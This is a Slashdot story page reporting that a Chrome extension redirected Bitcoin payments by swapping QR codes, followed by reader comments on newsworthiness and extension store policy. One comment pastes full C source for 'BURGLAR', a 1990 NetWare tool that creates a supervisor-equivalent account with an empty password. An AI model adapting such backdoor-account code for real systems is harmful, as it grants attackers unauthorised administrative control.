Google Chrome Extension Caught Stealing Bitcoin From Users (softpedia.com)

← Back to Stories (view on slashdot.org)

Google Chrome Extension Caught Stealing Bitcoin From Users (softpedia.com)

Posted by BeauHD on Saturday March 12, 2016 @02:22PM from the buyer-beware dept.

An anonymous reader writes: Bitcoin exchange portal Bitstamp is warning users of a Google Chrome extension that steals their Bitcoin when making a transfer. According to Bitstamp, this extension contains malicious code that is redirecting payments to its own Bitcoin address. Bitcoin web app developer Devon Weller confirmed Bitstamp's findings, saying that the extension was secretly replacing Bitcoin QR codes with its own. The extension's name is BitcoinWisdom Ads Remover and is still available on the Google Chrome Web Store. In July 2015, many users reported having similar issues with the same extension.

28 comments

Min score:

Reason:

Sort:

QR codes: by Gravis+Zero · 2016-03-12 14:26 · Score: 1

don't trust them.

--
Anons need not reply. Questions end with a question mark.
1. Re:QR codes: by Anonymous Coward · 2016-03-12 18:25 · Score: 0
  
  Let me be clear: this is good for bitcoin.
  /s
NEWs...the point is it's supposed to be NEW by Anonymous Coward · 2016-03-12 14:28 · Score: 1

submitted 8 months ago to the subreddit...hardly cutting edge news.
1. Re:NEWs...the point is it's supposed to be NEW by NotInHere · 2016-03-12 14:46 · Score: 4, Informative
  
  The NEWS here is that its still available for download, on march 12 2016.
2. Re:NEWs...the point is it's supposed to be NEW by hercludes · 2016-03-12 14:59 · Score: 2
  
  Exactly, I'm not one to judge whether something should be on Slashdot or not, but even I have to concede that this seems wildly out of place. The plug-in itself has only 5 ratings and 94 users, maybe if there were 100,000 users or something this would be relevant, but the app is clearly dead at such low statistics. Not to mention the functionality is completely pointless, "blocks ads from bitcoinwisdom.com" -- do people just have a unique extension to block ads for each site they visit? Such a weird story to find on Slashdot.
3. Re:NEWs...the point is it's supposed to be NEW by PinkyGigglebrain · 2016-03-12 15:58 · Score: 1
  
  So you don't think any effort should be made to let as many people as possible know about the danger so they can avoid the app until it gets taken down?
4. Re:NEWs...the point is it's supposed to be NEW by Anonymous Coward · 2016-03-12 16:45 · Score: 1
  
  https://www.reddit.com/r/Bitco...
  
  The code has been cleaned out. Apparently my google account was hacked and someone uploaded this fake "update".
  My account password has been changed and a clean version of the plugin was uploaded to the chrome store again.
  so...think he was hacked again, or just bullshitting?
5. Re:NEWs...the point is it's supposed to be NEW by Rockoon · 2016-03-12 16:51 · Score: 1
  
  So you don't think any effort should be made to let as many people as possible know...
  In order to let as many people as possible know, you have to literally let everyone alive know. Odds are fairly good that in order to accomplish that, the only requirement-fulfilling "any effort" is in fact "too much effort."
  
  I suggest that this "any effort" begins with you. I will happily join you and help as soon as I have seen that you have really committed to this endeavor. Tell you what.. if you manage to get even 10% of the way to the goal, I will promise to deliver the other 90%.
  
  --
  "His name was James Damore."
6. Re:NEWs...the point is it's supposed to be NEW by Anonymous Coward · 2016-03-12 18:38 · Score: 0
  
  they're sing a new trick now. i presume they stopped what they were doing back then, and got caught again
7. Re:NEWs...the point is it's supposed to be NEW by drinkypoo · 2016-03-13 01:20 · Score: 1
  
  Exactly, I'm not one to judge whether something should be on Slashdot or not,
  Yes you are, hypocrite. You're doing it right now.
  
  but even I have to concede that this seems wildly out of place.
  Well, it's about security, trojans, and bitcoin. What part of that seems wildly out of place on Slashdot? Are you just upset that this isn't an article about women in coding?
  
  --
  "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
8. Re:NEWs...the point is it's supposed to be NEW by hercludes · 2016-03-15 08:05 · Score: 1
  
  I was almost sure I was going to get a reply like this. Yes, I'm admitting that I'm going against my own standards of not judging if an article belongs on Slashdot or not. Congratulations on dissecting that for us. Anyways, I'm glad that you lack the attention of the majority of other Slashdot readers and insert "What part of that seems wildly out of place on Slashdot" before reading the next sentence where I state why it seems out of place on Slashdot. I don't know why you're projecting about women in coding, you are make rather large assumptions. I care about as much for women in coding articles as much as I do for men in coding articles.
9. Re:NEWs...the point is it's supposed to be NEW by hercludes · 2016-03-15 08:08 · Score: 1
  
  So you don't think any effort should be made to let as many people as possible know about the danger so they can avoid the app until it gets taken down?
  That's a good point, I'd rather not see a post for every single new virus introduced into the google playstore. Thanks for bringing in a new perspective.
94 users by Anonymous Coward · 2016-03-12 14:55 · Score: 1

As above.
Stealing text too.. by Anonymous Coward · 2016-03-12 14:57 · Score: 0

Apparently it also stole part of the summary.
Feel the leetness by Anonymous Coward · 2016-03-12 15:10 · Score: 1

/* BURGLAR - To recover the supervisor account of netware 386
(c) 1990 Cyco Automation, created by Bart Mellink.
(My first NLM)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
main( int argc, char *argv[] ) {
long task;
char *name;
printf("BURGLAR - Create supervisor equivalent user account\n" );
printf(" (c) Cyco Automation (bm) 1990\n");
task=SetCurrentTask(-1L);
SetCurrentConnection(0); /* set connection 0 -> superuser */
SetCtrlCharCheckMode(0); /* No abort on ctrl-c */
name=argv[1];
if (argc>1) { /* First create an user object in the bindery */
if (CreateBinderyObject(name,OT_USER,BF_STATIC,0x31)==0)
printf("New user %s created\n",name);
else
printf("User %s allready exists\n",name); /* User object must have an equivalent property */
CreateProperty(name,OT_USER,"SECURITY_EQUALS",BF_STATIC|BF_SET,0x32); /* Add supervisor equivalent to equivalence property */
if (AddBinderyObjectToSet(name,OT_USER,"SECURITY_EQUALS","SUPERVISOR",OT_USER)==0)
printf("User made supervisor equivalent\n");
else
printf("User was allready supervisor equivalent\n"); /* Create password property and make empty string */
if (ChangeBinderyObjectPassword(name,OT_USER,"","")==0)
printf("Password removed from user\n");
else { /* On error check if we had allready empty password */
if (VerifyBinderyObjectPassword(name,OT_USER,"")==0)
printf("Password was allready removed from user\n");
else
printf("Could not remove password from user\n");
}
}
else {
printf(" Error: Username missing from commandline\n");
}
ReturnBlockOfTasks(&task,1L);
ReturnConnection( GetCurrentConnection() );
return 0;
}
1. Re:Feel the leetness by Anonymous Coward · 2016-03-12 20:37 · Score: 0
  
  I have no idea how this code is relevant. I just think it's funny that you tried to post it without realizing that HTML would eat the opening angle bracket on the #includes.
Re:Should Google aim their penises while they piss by Anonymous Coward · 2016-03-12 15:29 · Score: 0

Somebody ought to mod the parent up. It shouldn't be at -1. It's better than the other comments here. It's totally correct to point out that security is only possible when people act responsibly. No software provider should have to babysit the users of its products. This isn't a case of the extension being installed in people's browsers unawares. If it's installed, it's because somebody went out of their way to install it. So they should be prepared to deal with the consequences of their actions. Even removing plugins deemed "malicious" by some people is probably something that the operators of mobile application stores shouldn't be doing. What's "malicious" to one user could be exactly what another user wants to have happen. For example some people would consider Firefox for Android to be a form of malware, given how it can use an excessive amount of device resources. Yet others wouldn't consider it "malicious" in any way, and in fact consider it their favorite mobile web browser. "Maliciousness" is in the eye of the beholder, and so when it comes to installing potentially-"malicious" software it is up to the user doing the installation to know what they're doing and to be prepared to deal with the consequences if they go ahead and make a bad decision.
Obligatory Nelson by Anonymous Coward · 2016-03-12 16:48 · Score: 0

Ha Ha!
p.s. "And nothing of value was lost." -Slashdotters everywhere /Thread
Just a bug... by Anonymous Coward · 2016-03-12 17:18 · Score: 0

It was just a bug, the bitcoin address accidentally got replaced by the donation address.
why not ABP ? by thygate · 2016-03-12 17:33 · Score: 4, Insightful

Adblock Plus also blocks all the advertisements on bitcoinwisdom, so why would anyone bother with this extension ?
1. Re:why not ABP ? by pD-brane · 2016-03-13 01:12 · Score: 1
  
  People install this, because most of them are sheep. They don't think critically. They just install anything that appears cool, or what other sheeple tell them is useful.
2. Re:why not ABP ? by Bing+Tsher+E · 2016-03-13 03:51 · Score: 1
  
  Hey, Bitcoins are cool and trendy, man. Don't be dissing bitcoins.
  I use them mainly to buy and sell Magic The Gathering cards.
3. Re:why not ABP ? by Anonymous Coward · 2016-03-14 04:09 · Score: 0
  
  The issue isn't the apparent uselessness/useless use of Bitcoin, but the fact that people are dumb and don't use a trustworthy or even semi-trustworthy adblocker and instead go for the first thing that looks like it does what they want. I've see people with 3 or 4 different adblocker extensions. It's akin to someone downloading SuperTuneUpMyPC, because they think it will speed up their computer.
Re:Should Google aim their penises while they piss by andymadigan · 2016-03-12 20:09 · Score: 2

This extension does something completely different than what it claims to do, and makes no mention of this extra "feature". That should be enough to have it taken down. Google has made it essentially impossible to install extensions from outside their "store". If Google makes no representations about the quality or safety of the extensions in the store, then why not let sites host the extensions themselves?

There's practically no information in the store to base a decision on other than the name of the author and a description. If extensions were hosted on their own sites you could at least know what organization created the extension by verifying the HTTPS cert of the site. With the store model you're trusting Google to verify the information in the store.

--
The right to protest the State is more sacred than the State.
Talented Hackers by bennebw · 2016-03-14 01:24 · Score: 1

Instead of being evil, why don't these talented hackers turn their powers to something for the good of humanity, like maybe a Chrome Extension that would blot out the words "Kim Kardashian" on any web page. Of course, if they're looking for a vector for their dirty deeds, that would be huge.